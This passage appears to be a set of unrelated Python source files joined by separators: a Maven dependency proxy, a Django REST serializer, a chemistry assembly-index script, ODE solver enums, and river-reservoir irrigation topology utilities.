if dev_email is not None:
dev_info['email'] = dev_email.text
developers.append(dev_info)
return {'groupid': groupid, 'developers': developers}
def get_version_hash(self, pkg_name, pkg_version, algorithm='sha1'):
if algorithm not in ('sha1', 'md5'):
raise Exception("algorithm %s is not supported!" % algorithm)
# Check the md5 for jar file of the package version.
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar.md5
gid, aid = pkg_name.split('/')
possible_extensions = ['jar', 'aar', 'war']
version_hash = None
for extension in possible_extensions:
try:
version_hash_url = "https://repo1.maven.org/maven2/%s/%s/%s/%s" % (
gid.replace('.', '/'), aid, pkg_version, self._get_pkg_fname(
pkg_name=pkg_name, pkg_version=pkg_version, suffix="%s.%s" % (extension, algorithm)))
version_response = requests.request('GET', version_hash_url)
if not version_response.ok:
raise Exception("URL not valid for extension %s!" % extension)
# sometimes the link only contains hash value
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar.sha1
# sometimes the link contains both hash value and the file path
# http://repo1.maven.org/maven2/maven/maven-gump-plugin/2.0.1/maven-gump-plugin-2.0.1.jar.sha1
version_hash = version_response.text.split(' ')[0]
break
except Exception as e:
logging.warning("cannot get_version_hash for extension %s for pkg %s ver %s: %s",
extension, pkg_name, pkg_version, str(e))
if not version_hash:
logging.error("fail in get_version_hash for pkg %s ver %s, ignoring!", pkg_name, pkg_version)
return None
return version_hash
def get_dep(self, pkg_name, pkg_version=None, flatten=False, cache_only=False):
super(MavenProxy, self).get_dep(pkg_name=pkg_name, pkg_version=pkg_version, flatten=flatten,
cache_only=cache_only)
# load cached dependency information
pkg_info_dir = self.get_pkg_info_dir(pkg_name=pkg_name)
if pkg_info_dir is not None:
if flatten:
dep_fname = self.get_flatten_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
else:
dep_fname = self.get_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
dep_file = join(pkg_info_dir, dep_fname)
if exists(dep_file):
logging.warning("get_dep: using cached dep_file %s!", dep_file)
if self.dep_format == 'json':
try:
return json.load(open(dep_file, 'r'))
except:
logging.debug("fail to load dep_file: %s, regenerating!", dep_file)
else:
logging.error("get_dep: output format %s is not supported!", self.dep_format)
return None
if cache_only:
return None
# use maven dependency to get the dependencies
temp_repo_dir = tempfile.mkdtemp(prefix='get_dep-')
# https://stackoverflow.com/questions/3342908/how-to-get-a-dependency-tree-for-an-artifact
# http://maven.apache.org/plugins/maven-dependency-plugin/tree-mojo.html
dep_pkgs = {}
flatten_dep_pkgs = {}
try:
pom_filename = 'pom.xml'
dep_tree_filename = 'dep_tree.txt'
metadata_file = self.get_metadata_file(pkg_name=pkg_name, pkg_version=pkg_version)
shutil.copy(metadata_file, join(temp_repo_dir, pom_filename))
get_dep_cmd = ['mvn', 'dependency:tree', '-DoutputFile=%s' % dep_tree_filename, '-DoutputType=text']
exec_command('mvn dependency:tree', get_dep_cmd, cwd=temp_repo_dir)
dep_tree_file = join(temp_repo_dir, dep_tree_filename)
for line in open(dep_tree_file, 'r'):
line = line.strip('\n')
if not line:
continue
line_parts = line.split(' ')
if len(line_parts) <= 1:
continue
elif len(line_parts) == 2:
dep_pkg_info = line_parts[-1].split(':')
if len(dep_pkg_info) != 5:
logging.error("pkg %s has dependency with unexpected format: %s", pkg_name, line)
gid, aid, _, vid, dep_type = dep_pkg_info
# TODO: do we want compile dependency or test dependency (dep_type), currently recording both
dep_name = '%s/%s' % (gid, aid)
dep_pkgs[dep_name] = vid
flatten_dep_pkgs[dep_name] = vid
else:
dep_pkg_info = line_parts[-1].split(':')
if len(dep_pkg_info) != 5:
logging.error("pkg %s has indirect dependency with unexpected format: %s", pkg_name, line)
gid, aid, _, vid, dep_type = dep_pkg_info
dep_name = '%s/%s' % (gid, aid)
flatten_dep_pkgs[dep_name] = vid
except Exception as e:
logging.error("failed while getting dependencies (%s) for pkg %s: %s!", flatten_dep_pkgs, pkg_name, str(e))
logging.warning("%s has %d deps and %d flatten deps", pkg_name, len(dep_pkgs), len(flatten_dep_pkgs))
if pkg_info_dir is not None:
if not exists(pkg_info_dir):
os.makedirs(pkg_info_dir)
dep_fname = self.get_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
dep_file = join(pkg_info_dir, dep_fname)
flatten_dep_fname = self.get_flatten_dep_fname(pkg_name=pkg_name, pkg_version=pkg_version, fmt=self.dep_format)
flatten_dep_file = join(pkg_info_dir, flatten_dep_fname)
if self.dep_format == 'json':
json.dump(dep_pkgs, open(dep_file, 'w'), indent=2)
json.dump(flatten_dep_pkgs, open(flatten_dep_file, 'w'), indent=2)
else:
logging.error("get_dep: output format %s is not supported!", self.dep_format)
# remove the repo directory
shutil.rmtree(temp_repo_dir)
return flatten_dep_pkgs if flatten else dep_pkgs
def install_dep(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None):
# TODO: currently dependencies are installed one by one, improve it to be installed in one command!
# Invoke install iteratively to install all the dependencies
dep_pkgs = self.get_dep(pkg_name=pkg_name, pkg_version=pkg_version)
# mvn dependency:get -Dartifact=org.apache.kafka:kafka_2.11:2.0.0
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1
for dep_name, dep_version in dep_pkgs.items():
self.install(pkg_name=dep_name, pkg_version=dep_version, trace=trace, trace_string_size=trace_string_size,
sudo=sudo, outdir=outdir)
def has_install(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
return True
def test(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None, timeout=None):
pass
def has_test(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
return False
def main(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None, timeout=None):
pass
def has_main(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
return False
def exercise(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None, timeout=None):
pass
def has_exercise(self, pkg_name, pkg_version=None, binary=False, with_dep=False):
return False
|
from django.utils.text import slugify
from rest_framework import serializers
from fragments.models import Post, Fragment
class FragmentSerializer(serializers.ModelSerializer):
"""
Serializer for Fragment instances
"""
class Meta:
model = Fragment
fields = (
'post',
'fragment_type',
'order',
'content',
'is_sanitized',
'credit',
'caption',
'language',
'embed_type',
'created',
'updated',
)
read_only_field = (
'created',
'updated',
)
class PostSerializer(serializers.ModelSerializer):
"""
Serializer for Post instances
"""
fragments = FragmentSerializer(many=True, required=False)
class Meta:
model = Post
fields = (
'title',
'slug',
'tldr',
'author',
'fragments',
'org',
'created',
'updated',
)
read_only_field = (
'created',
'updated',
)
extra_kwargs = {
'slug': {'required': False}
}
def validate(self, attrs):
author = attrs.get('author')
org = attrs.get('org')
if author and org:
if not org.is_member(author):
raise serializers.ValidationError({
'organization': 'Author is not part of organization: %s' % (
org.name)
})
title = attrs.get('title')
slug = attrs.get('slug')
if title and not slug:
attrs['slug'] = slugify(unicode(title))
return attrs
|
import assemblycalculator as ac
import multiprocessing as mp
import pickle
import pandas as pd
import os
def calculate_assembly_MC(inchi):
""" Calculate the assembly value of an inchi string using the monteCarlo assembly method
Args:
month (string): YYYY-MM description of the month where the compound was sampled from
inchi (string): inchi representation of the SureChemBL compound
Returns:
dict: values of month, inchi, and the assembly index
"""
ai = ac.calculate_ma(inchi,
120,
"monte-carlo",
num_frags_hist=10000,
path_samples=20000)
return {"inchi": inchi, "ai": ai}
def calculate_assembly_fragment(inchi):
""" Calculate the assembly value of an inchi string using the fragment assembly method
Args:
month (string): YYYY-MM description of the month where the compound was sampled from
inchi (string): inchi representation of the SureChemBL compound
Returns:
dict: values of month, inchi, and the assembly index
"""
ai = ac.calculate_ma(inchi, method="fragment", timeout=300)
return {"inchi": inchi, "ai": ai}
def read_cpds(fp):
""" Read inchi compounds from csv files
Args:
fp (string): Relative file path to csv file with SureChemBL cpd data
Returns:
list: list of all inchis contained in the csv file
"""
data = pd.read_csv(fp)
return data["InChI"].tolist()
def get_changing_percentileFiles(side, precision):
""" Find the files which correspond to change percentiles
Args:
side (string): min/max, referring to the largest negative/positive changes, respectively
precision (string): string representation of percentile precision
Returns:
list: list of file names which fit the appropriate criteria
"""
files = []
for f in os.listdir("Data/Cpd_Data/"):
if f.startswith("ids_change_" + side + "Percentile_" +
precision) and f.endswith(".csv"):
files.append(f)
return files
def get_top_percentileFiles():
""" Returns the csv files corresponding to compounds above the 99.99th percentile
of total attachment values
Returns:
list: list of file names which fit the appropriate criteria
"""
files = []
for f in os.listdir("Data/Cpd_Data/"):
if f.startswith("ids_above99_99percentile"):
files.append(f)
return files
def calculate_MAs(files):
""" Wrapper function for MA calculation
Args:
files (list): list of all files which contain relevant data
Returns:
Writes a file containing inchis linked with assembly values
"""
for f in files:
cpds = read_cpds("Data/Cpd_Data/" + f)
#Set up parallelization - a bit of overhead for setting it up, but that's fine
pool = mp.Pool(64)
#Calculate assembly values using MC method
assemblies = pool.map(calculate_assembly_MC, cpds)
pool.close()
pickle.dump(assemblies,
file=open("Data/Cpd_Data/" + f[:-4] + "_assembly.p", "wb"))
def calculate_largeMAs(f):
""" Calculates the MA of compounds with a Monte Carlo values >= 40 using
the "fragment" method - also a rough approximation, but is better for large values
Args:
f (string): file containing inchi strings &
"""
data = pickle.load(file=open("Data/Cpd_Data/" + f, "rb"))
large_MA_cpds = []
for cpd in data:
if cpd["ai"] >= 40:
large_MA_cpds.append(cpd["inchi"])
print("----- " + f + " -----")
print(large_MA_cpds)
print()
pool = mp.Pool(64)
assemblies = pool.map(calculate_assembly_fragment, large_MA_cpds)
pool.close
pickle.dump(assemblies,
file=open("Data/Cpd_Data/" + f[:-2] + "_large.p", "wb"))
def main():
""" Steps
1. Read in compounds from a specific file
2. MC assembly algorithm
3. Save calculations using name + "assembly" - link inchi & MA
4. Link assembly values to csv file (eventually, probably do this in a separate script)
"""
# ### SMALLEST & LARGEST CHANGE VALUES ###
# #Options: min/max, 0.1/0.01
# for option in [("min", "0.1"), ("min", "0.01"), ("max", "0.1"),
# ("max", "0.01")]:
# files = get_changing_percentileFiles(option[0], option[1])
# calculate_MAs(files)
# ### TOP ATTACHMENT VALUES ###
# files = get_top_percentileFiles()
# calculate_MAs(files)
for pair in [(1980, 1984), (1985, 1989), (1990, 1994), (1995, 1999),
(2000, 2004), (2005, 2009), (2010, 2014), (2015, 2019)]:
f = "ids_above99_99percentile" + str(pair[0]) + "_" + str(
pair[1]) + "cpdData_assembly.p"
calculate_largeMAs(f)
if __name__ == "__main__":
main()
|
from enum import Enum, IntEnum
class Axe(IntEnum):
X = 0
Y = 1
Z = 2
class OdeSolver(Enum):
"""
Four models to solve.
RK is pretty much good balance.
"""
COLLOCATION = 0
RK = 1
CVODES = 2
NO_SOLVER = 3
class Instant(Enum):
"""
Five groups of nodes.
START: first node only.
MID: middle node only.
INTERMEDIATES: all nodes except first and last.
END: last node only.
ALL: obvious.
"""
START = "start"
MID = "mid"
INTERMEDIATES = "intermediates"
END = "end"
ALL = "all"
|
"""
Utils and functions to determine irrigation topology
Inne Vanderkelen - March 2021
"""
# import modules
import pfaf.pfafstetter as pfaf # decode package from Naoki, see https://github.com/nmizukami/pfaf_decode
import pandas as pd
import numpy as np
import geopandas as gpd
###################
# 1. Helper functions
def get_mainstream(pfafs, pfaf_outlet):
"""get list of mainstream pfaf codes"""
mainstream = []
for p in pfafs:
#print(pfaf.get_tributary(p, pfaf_outlet))
if pfaf.get_tributary(p, pfaf_outlet)=='-999':
mainstream.append(p)
return mainstream
def get_downstream_PFAF(river_shp):
"""Get PFAF code of directly downstream segment
input df of river segments with seg_id and Tosegment """
to_segment = river_shp[['PFAF','seg_id']].rename(columns={'seg_id':'Tosegment', "PFAF":"PFAF_downstream"})
df_PFAF_downstream = river_shp.merge(to_segment[["PFAF_downstream","Tosegment"]], on='Tosegment',how='left')
return df_PFAF_downstream[["PFAF","PFAF_downstream"]]
def get_pfafs_start2end(pfaf_start,pfaf_end,river_shp, include_end=True):
"""Get pfafs of stream network of pfaf_start to pfaf_end"""
# get PFAF codes and downstream PFAF codes
df_PFAF_downsteam = get_downstream_PFAF(river_shp)
# get list of pfafs between start and end
pfaf_start2end = [pfaf_start]
# initialise
pfaf_current = pfaf_start
pfaf_down = pfaf_start
# go downstream
while pfaf_down != pfaf_end:
if (df_PFAF_downsteam['PFAF']==pfaf_current).sum() > 0:
pfaf_down = df_PFAF_downsteam.loc[df_PFAF_downsteam['PFAF']==pfaf_current,'PFAF_downstream'].values[0]
pfaf_start2end.append(pfaf_down)
pfaf_current = pfaf_down
if not include_end: pfaf_start2end.remove(pfaf_start)
return pfaf_start2end
def get_streamlength_total(pfaf_start,pfaf_end,river_shp):
"""Get river stream length between start pfaf and end pfaf, including length of pfaf end and start
input: start and end pfaf code, df with river network (pfaf, to_segment, length)"""
# get PFAF codes between start and end
pfafs_start2end = get_pfafs_start2end(pfaf_start,pfaf_end,river_shp)
# calculate total legth between 2 segments (including the lengths of the segments themselves)
return river_shp.loc[river_shp['PFAF'].isin(pfafs_start2end),'Length'].sum()
###################
# 2. Functions to select reservoir pfafs and corresponding outlets
def get_pfafs_res(river_shp):
"""return list of reservoir pfaf codes based on islake variable (to be replaced!!)"""
# Select reservoirs based on islake.
return list(river_shp.loc[river_shp['islake']==1,'PFAF'].values)
def get_outlets(river_shp,pfaf_reservoirs,threshold):
"""Get pfafstetter codes of outlets (end of influence where reservoir serves)
based on: 1. river mouth is reached (there is no downstream pfaf code)
2. Next reservoir on stream network is reached
3. length threshold is exceeded (only inlcude segments within threshold)
input: gdf of river shps, list of pfaf codes of reservoirs and length threshold (in m)
output: list of outlets corresponding to reservoir list"""
import math
pfaf_outlets = []
count = 1
print('-------- Searching for outlets --------')
print('')
for pfaf_res in pfaf_reservoirs:
print('processing '+str(count)+ ' of '+str(len(pfaf_reservoirs)))
print('reservoir: '+pfaf_res)
# get downstream lookup table
downstream_lookup = get_downstream_PFAF(river_shp)
# initialise
pfaf_current = pfaf_res
total_length = 0
outlet_found = False
# travel downstream from reservoir pfaf to identify outlet (end of reservoir influence)
while not outlet_found:
# next downstream segment
pfaf_down = downstream_lookup[downstream_lookup['PFAF']==pfaf_current]['PFAF_downstream'].values[0]
# res pfaf has no downstream
if math.isnan(float(pfaf_down)):
pfaf_outlet = pfaf_current
outlet_found = True
print('reservoir has no downstream')
else:
# add length of downstream segment to total length
total_length = total_length + river_shp[river_shp['PFAF']==pfaf_down]['Length'].values[0]
# check if pfaf_current is outlet:
# 1. pfaf is river mouth (no outlet downstream)
if math.isnan(float(downstream_lookup[downstream_lookup['PFAF']==pfaf_down]['PFAF_downstream'].values[0])):
print('river mouth reached')
print('')
pfaf_outlet = pfaf_down
outlet_found = True
# 2. pfaf is other reservoir
elif pfaf_down in pfaf_reservoirs:
print('reservoir reached')
print('')
pfaf_outlet = pfaf_down
outlet_found = True
# 3. length threshold is exceeded for downstream segment (so include current)
elif total_length > threshold:
print('length threshold exceeded')
print('')
pfaf_outlet = pfaf_current
outlet_found = True
# move downstream
else:
pfaf_current = pfaf_down
pfaf_outlets.append(pfaf_outlet)
count=count+1
print('---------- All outlets found! ----------')
return pfaf_outlets
###################
# 3. Functions to determine conditions for topology selection
def get_pfaf_betweenres(pfaf_res,pfaf_outlet,all_pfafs, include_end=True):
"""
return list of pfaf codes from all_pfafs that are located between pfaf_res (upper) and pfaf_outlet (lower)
including upper reach (providing reservoir), but excluding outlet
"""
# find all pfaf codes of segments upstream of Palisades
pfaf_subbasin = pfaf.get_subbasin(all_pfafs, pfaf_outlet, include_closed=False)
# identify upstream basin of reservoir and exclude from pfafs_subbasin
pfaf_betweenres= []
for i in pfaf_subbasin:
if not pfaf.check_upstream(i,pfaf_res) and i!=pfaf_res: # only include reaches downstream of reservoir
pfaf_betweenres.append(i)
if include_end:
pfaf_betweenres.append(pfaf_res)
return pfaf_betweenres
def exclude_higher_botelev(pfafs, pfaf_res, seg_topo):
""" Exclude segments that have higher BottomElev than reservoir BotElev
input: pfafs: list with all segments
pfaf_res: reservoir pfaf code
seg_topo: (geo)pandas dataframe with BotElev and PFAF per segment
output: pfaf_belowres: list with pfafs where higher botelev are excluded.
"""
botelev_res = seg_topo.loc[seg_topo['PFAF']==pfaf_res,'BotElev'].values[0]
pfaf_belowres = seg_topo.loc[seg_topo.PFAF.isin(pfafs) & (seg_topo.BotElev < botelev_res), 'PFAF']
return pfaf_belowres
def exclude_upstream_other_res(pfafs, pfaf_reservoirs):
"""
Exlcude segments upstream of other reservoirs and segments of other reservoirs themselves as well
input: pfafs: list of current selection of pfafs, pfaf_reservoir (list of all reservoir pfafs).
output: pfafs_without_upstream_other_res
"""
# identify pfafs of reservoirs which are in currently identified network (to reduce length of loop below)
pfaf_reservoirs_network = [] # pfaf_reservoirs in pfaf_belowres
for p in pfaf_reservoirs:
if p in pfafs:
pfaf_reservoirs_network.append(p)
# identify pfafs upstream of other reservoirs (-> to exclude)
pfafs_upstream_other_res = []
for i in pfafs:
for p in pfaf_reservoirs_network:
if pfaf.check_upstream(i,p) or (i==p): # exclude upstream of other reservoir and other reservoir itself
pfafs_upstream_other_res.append(i)
# exclude those values
pfafs_without_upstream_other_res = []
for i in pfafs:
if not i in pfafs_upstream_other_res:
pfafs_without_upstream_other_res.append(i)
return pfafs_without_upstream_other_res
def godown_tributaries(tributary,tributaries_res,river_shp,length_trib,threshold):
"""go down on tributaries and apply length condition (recursive function)
output: list of dependent tributaries"""
# get downstream values for all pfafs
downstream_lookup = get_downstream_PFAF(river_shp)
# get all subtributaries of segment that flows in resstream
all_subtributaries = pfaf.get_tributaries(tributary, 1)
for i in range(1,len(all_subtributaries.keys())):
pfaf_inresstream = list(all_subtributaries.keys())[i]
# add segment to reservoir tributaries (serverd by reservoir) # HERE THE CONDITION of first tributary to main stem can be adjusted.
tributaries_res.append(pfaf_inresstream)
# go down in subtributaries and apply threshold length condition
subtributaries_considered = []
for key in all_subtributaries[pfaf_inresstream].keys():
# save considered tributaries to not loop over them twice
subtributary = all_subtributaries[pfaf_inresstream][key]
# check if substream tributary flows into tributary
downstream_subtributary = downstream_lookup[downstream_lookup['PFAF'].isin(subtributary)]['PFAF_downstream'].values.tolist() # get all substream pfafs for subtributaries
intributary = [True for trib in downstream_subtributary if trib in tributaries_res]
#if not intributary: print(subtributary)
if subtributary == '31249843': print('subtribfound')
if (subtributary not in subtributaries_considered) and (intributary):
if len(subtributary) == 1:
length_trib_withsubtrib1 = length_trib + river_shp.loc[river_shp['PFAF'] == subtributary[0],'Length'].values[0]
if length_trib_withsubtrib1 < threshold:
tributaries_res.append(subtributary[0])
# also include other subtributary (part of main stream) if exists
tributary_upstream = str(int(subtributary[0])+1)
if (tributary_upstream in river_shp['PFAF'].values):
length_trib_withsubtrib2 = length_trib + river_shp.loc[river_shp['PFAF'] == tributary_upstream,'Length'].values[0]
if (length_trib_withsubtrib2 < threshold):
tributaries_res.append(tributary_upstream)
return tributaries_res
else:
# find tributaries again
tributaries_res = godown_tributaries(subtributary,tributaries_res,river_shp,length_trib,threshold)
subtributaries_considered.append(subtributary)
return tributaries_res
# this function replaces the get_pfaf_between_res
def get_pfaf_resstream_and_in_tributary_threshold(pfaf_res, pfaf_outlet, river_shp, threshold):
""" get reservoir stream and all tributaries on threshold distance from reservoir main stream
input: pfaf_res, pfaf_outlet, river_shp, threshold
output: tributaries_res: list with all pfafs that are on mainstream or on tributary wihtin treshold distance from reservoir main stream
"""
resstream = get_pfafs_start2end(pfaf_res,pfaf_outlet,river_shp, include_end=False)
# get lookup list of downstream PFAFS
downstream_lookup = get_downstream_PFAF(river_shp)
tributaries_considered = [] # all considered tributaries
tributaries_res = [] # all tributaries dependend on reservoir
count = 1
for pfaf_resstream in resstream:
print('processing tributaries of reach '+str(count)+' of '+str(len(resstream)), end='\r')
if pfaf_resstream != pfaf_res:
# determine tributaries
subbasin = pfaf.get_subbasin(river_shp['PFAF'], pfaf_resstream ,include_closed = False)
all_tributaries = pfaf.get_tributaries(subbasin, 1)
# check if dictionary is not empty
if all_tributaries:
for key in all_tributaries[pfaf_resstream].keys():
# get list of pfafs in one tributary
tributary = all_tributaries[pfaf_resstream][key]
# get list of downstream pfafs of tributary pfafs
downstream_tributary = downstream_lookup[downstream_lookup['PFAF'].isin(tributary)]['PFAF_downstream'].values.tolist()
# check if one or more segments tributary flow directly into resstream
inresstream = [True for trib in downstream_tributary if trib in resstream]
# get only new tributaries and tributaries that directly flow into resstream
if (tributary not in tributaries_considered) and inresstream:
# NEXT TO DO only include if one pfaf of tributary list flows into resstream
if len(tributary)==1:
# save length of tributary river
trib_length = river_shp.loc[river_shp['PFAF'] ==tributary[0],'Length']
# add segment to reservoir demand (possibly here we can put a condition on only adding segment if it is below certain length)
tributaries_res.append(tributary[0])
# POSSIBLY: extend condition based on length of segment? TO be determined.
else:
# get all subtributaries of segment that flows in resstream
all_subtributaries = pfaf.get_tributaries(tributary, 1)
for i in range(len(all_subtributaries.keys())):
pfaf_inresstream = list(all_subtributaries.keys())[i]
# initialise length_trib with first segment length
length_trib = river_shp.loc[river_shp['PFAF'] == pfaf_inresstream,'Length'].values[0]
# add segment to reservoir tributaries (serverd by reservoir) # HERE THE CONDITION of first tributary to main stem can be adjusted.
tributaries_res.append(pfaf_inresstream)
# go down in subtributaries and apply threshold length condition
subtributaries_considered = []
for key in all_subtributaries[pfaf_inresstream].keys():
# get list of pfafs in one tributary
subtributary = all_subtributaries[pfaf_inresstream][key]
# check if substream tributary flows into tributary
downstream_subtributary = downstream_lookup[downstream_lookup['PFAF'].isin(subtributary)]['PFAF_downstream'].values.tolist() # get all substream pfafs for subtributaries
# concatenate resstream list and tributaries_res (if filled)
considered = resstream+tributaries_res if tributaries_res else resstream
intributary = [True for trib in downstream_subtributary if trib in considered]
if (subtributary not in subtributaries_considered) and intributary:
subtributaries_considered.append(subtributary)
if len(subtributary) == 1:
length_trib = length_trib + river_shp.loc[river_shp['PFAF'] == subtributary[0],'Length'].values[0]
if length_trib < threshold:
tributaries_res.append(subtributary[0])
else:
# find tributaries again
tributaries_res = godown_tributaries(subtributary,tributaries_res,river_shp,length_trib,threshold)
# save considered tributaries to not loop over them twice
tributaries_considered.append(tributary)
# make sure to not include pfaf_res in tributaries_res
if pfaf_res in tributaries_res: tributaries_res.remove(pfaf_res)
count = count+1
return tributaries_res + resstream
###################
# 4. Functions to determine topology based on conditions
def get_seg_dependency(pfaf_reservoirs, pfaf_outlets, seg_topo, threshold):
"""Create dependency dictionary with for each river segment pfaf corresponding reservoir pfafs
based on the following rules
1. Segments must be downstream of reservoir
2. Bottom elevation of segment cannot be higher than bottom elevation of reservoir segment
seg_topo is pandas df with information on river topology.
"""
# initialise dictionary with reservoir dependency per river
dependency_dict = {}
count = 1
# loop over reservoir and their respective outlets
for pfaf_res,pfaf_outlet in zip(pfaf_reservoirs, pfaf_outlets):
print('processing reservoir '+str(count)+ ' of '+str(len(pfaf_reservoirs)))
### CONDITIONS TO SELECT SEGMENTS PER RESERVOIR based on topology
# find all reaches between (res) and (outlet)
#pfaf_res2outlet = get_pfaf_betweenres(pfaf_res,pfaf_outlet,seg_topo['PFAF'],include_end=False)
# find all reaches between res and outlet with distance threshold for second order tributaries.
pfaf_in_threshold = get_pfaf_resstream_and_in_tributary_threshold(pfaf_res, pfaf_outlet, seg_topo, threshold)
# Exclude segments that have higher BottomElev than reservoir BotElev
pfaf_belowres = exclude_higher_botelev(pfaf_in_threshold, pfaf_res, seg_topo)
# Exlcude segments upstream of other reservoirs and segments of other reservoirs themselves as well
#pfafs_dependent = exclude_upstream_other_res(pfaf_belowres.values,pfaf_reservoirs)
# define here name of final selection
pfafs_selection = pfaf_belowres
#### END CONDITIONS
# get pfaf codes of all segments depenent on reservoir
pfaf_segment_res = seg_topo.loc[seg_topo.PFAF.isin(pfafs_selection),'PFAF'].values
for pfaf_seg in pfaf_segment_res:
# check if river pfaf has already dependend res
if pfaf_seg in dependency_dict:
# append to already existent list
dependency_dict[pfaf_seg] = dependency_dict[pfaf_seg] + [pfaf_res]
else:
dependency_dict[pfaf_seg] = [pfaf_res]
count = count+1
print('')
return dependency_dict
def get_res_dependency(pfaf_reservoirs, seg_dependency_dict):
"""Get list of segments dependend per reservoir
input: 1. list with pfaf codes of reservoirs,
2. dictionary with per segment dependend reservoirs
3. dictionary with weights per segment dependend reservoir
output: res_dependency_dict[pfaf_res] = [pfaf_to_sum]
dictionary with first level keys: reservoir pfafs
values: contributing river segments pfafs
"""
# dictionary to store dependency per reservoir
res_dependency_dict = {}
for pfaf_res in pfaf_reservoirs:
pfafs_to_sum = [] # initialise list of segments to sum by
for pfaf_seg, lookup_pfaf_res in seg_dependency_dict.items():
if pfaf_res in lookup_pfaf_res:
pfafs_to_sum.append(pfaf_seg)
# save dependend segments per reservoir in dict
res_dependency_dict[pfaf_res] = pfafs_to_sum
return res_dependency_dict
# function contained within function
def get_nhrus_per_res(pfaf_reservoirs, seg_dependency_dict):
"""Calculcate number of segments per reservoir
output: dictionary with keys: reservoir pfaf, value: number of segments dependend on it"""
# get hrus per reservoir ordered
res_dependency_dict = get_res_dependency(pfaf_reservoirs, seg_dependency_dict)
nseg_res_dict = {}
nseg_res = []
for pfaf_res in pfaf_reservoirs:
nseg_res.append(len(res_dependency_dict[pfaf_res]))
nseg_res_dict[pfaf_res] = len(res_dependency_dict[pfaf_res])
return nseg_res_dict
def get_weights_per_seg(dependency_dict, seg_topo, pfaf_reservoirs, weigh_smax_with_nseg = True):
"""Assign weights to dependend reservoirs for each river segment
returns dict with river segments and respective res weights.
!!! look up df has to be replaced with GRanD maximal storages
"""
if weigh_smax_with_nseg: # if weighting, get number of segments per reservoir
nseg_res_dict = get_nhrus_per_res(pfaf_reservoirs, dependency_dict)
weights_dict = {}
# identify segments with multiple reservoirs
for pfaf_seg in dependency_dict:
print('processing segment '+str(pfaf_seg)+ ' of '+str(len(dependency_dict)),end='\r' )
if len(dependency_dict[pfaf_seg])>1:
max_storages = [] # initialise list wich is going to be divided by list of total storages
for pfaf_res in dependency_dict[pfaf_seg]:
# create list of maximum reservoirs storages based on PFAF codes
# weigh max storage with number of segments the reservoir is providing to
if weigh_smax_with_nseg:
nseg = nseg_res_dict[pfaf_res]
max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0] / nseg
else: # just take max storages
max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0]
max_storages.append(max_storage)
# calculate weights and save in new dictionary
weights_dict[pfaf_seg] = (max_storages/sum(max_storages)).tolist()
return weights_dict
def get_weights_per_seg(dependency_dict, seg_topo, pfaf_reservoirs, weigh_smax_with_nseg = True):
"""Assign weights to dependend reservoirs for each river segment
returns dict with river segments and respective res weights.
!!! look up df has to be replaced with GRanD maximal storages
"""
if weigh_smax_with_nseg: # if weighting, get number of segments per reservoir
nseg_res_dict = get_nhrus_per_res(pfaf_reservoirs, dependency_dict)
weights_dict = {}
count = 1
# identify segments with multiple reservoirs
for pfaf_seg in dependency_dict:
print('processing segment '+str(count)+ ' of '+str(len(dependency_dict.keys())),end='\r' )
if len(dependency_dict[pfaf_seg])>1:
max_storages = [] # initialise list wich is going to be divided by list of total storages
for pfaf_res in dependency_dict[pfaf_seg]:
# create list of maximum reservoirs storages based on PFAF codes
# weigh max storage with number of segments the reservoir is providing to
if weigh_smax_with_nseg:
nseg = nseg_res_dict[pfaf_res]
max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0] / nseg
else: # just take max storages
max_storage = seg_topo.loc[seg_topo['PFAF'] == pfaf_res,'lake_Vol'].values[0]
max_storages.append(max_storage)
# calculate weights and save in new dictionary
weights_dict[pfaf_seg] = (max_storages/sum(max_storages)).tolist()
count = count+1
print('')
return weights_dict
def get_res_dependency_and_weights(pfaf_reservoirs, seg_dependency_dict, weights_dict):
"""Get list of segments dependend per reservoir, both in pfaf as in weights
input: 1. list with pfaf codes of reservoirs,
2. dictionary with per segment dependend reservoirs
3. dictionary with weights per segment dependend reservoir
output: res_dependency_dict[pfaf_res][pfaf_to_sum] = weight
dictionary with first level keys: reservoir pfafs
second level keys: contributing river segments pfafs
values: correspoding weights
"""
# dictionary to store dependency per reservoir
res_dependency_dict = {}
for pfaf_res in pfaf_reservoirs:
pfafs_to_sum = [] # initialise list of segments to sum by
weights_to_sum = [] # initialise list of segments to sum by
for pfaf_seg, lookup_pfaf_res in seg_dependency_dict.items():
if pfaf_res in lookup_pfaf_res:
pfafs_to_sum.append(pfaf_seg)
# get weights (if only reservoir weight = 1 )
if len(lookup_pfaf_res) == 1:
weight=1
else:
weight = weights_dict[pfaf_seg][lookup_pfaf_res.index(pfaf_res)]
weights_to_sum.append(weight)
# save dependend segments per reservoir in dict
res_dependency_dict[pfaf_res] = dict(zip(pfafs_to_sum, weights_to_sum))
return res_dependency_dict
###################
# 5. Functions to calculate irrigation demand
def calc_demand_per_res(hrus_shp, res_topo_dict):
"""Calculate irrigation demand per reservoir
input: dataframe with hru pfaf codes and irrigation demand ('QIRRIGmean')
dictionary with reservoir dependencies and weights
output: dictionary with reservoirs and corresponding water demands
"""
demand_dict = {}
count = 1
for reservoir in res_topo_dict:
print('calculating demand for reservoir '+str(count)+ ' of '+str(len(res_topo_dict)),end='\r' )
demand_tot = 0
# calculate sum over all river segments with weights applied
for seg_tosum in res_topo_dict[reservoir]:
# get weight to apply to segment
seg_weight = res_topo_dict[reservoir][seg_tosum]
